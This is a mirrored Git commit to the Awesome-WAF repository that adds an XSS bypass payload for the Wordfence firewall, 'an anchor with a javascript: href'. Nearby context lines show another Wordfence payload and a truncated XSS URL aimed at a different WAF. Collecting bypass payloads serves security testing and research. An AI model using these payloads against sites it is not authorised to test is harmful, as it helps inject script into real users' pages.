mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-01-13 00:05:03 +07:00
Added a existing WAF bypass
This commit is contained in:
parent
c1f09e0bb6
commit
1304506fc8
@ -2817,6 +2817,10 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
|
|||||||
```
|
```
|
||||||
|
|
||||||
### Wordfence
|
### Wordfence
|
||||||
|
- XSS Bypass by [@brutelogic](https://twitter.com/brutelogic)
|
||||||
|
```
|
||||||
|
<a href=javascript:alert(1)>
|
||||||
|
```
|
||||||
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
|
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
|
||||||
```
|
```
|
||||||
<a/href=javascript:alert()>click
|
<a/href=javascript:alert()>click
|
||||||
|
Loading…
Reference in New Issue
Block a user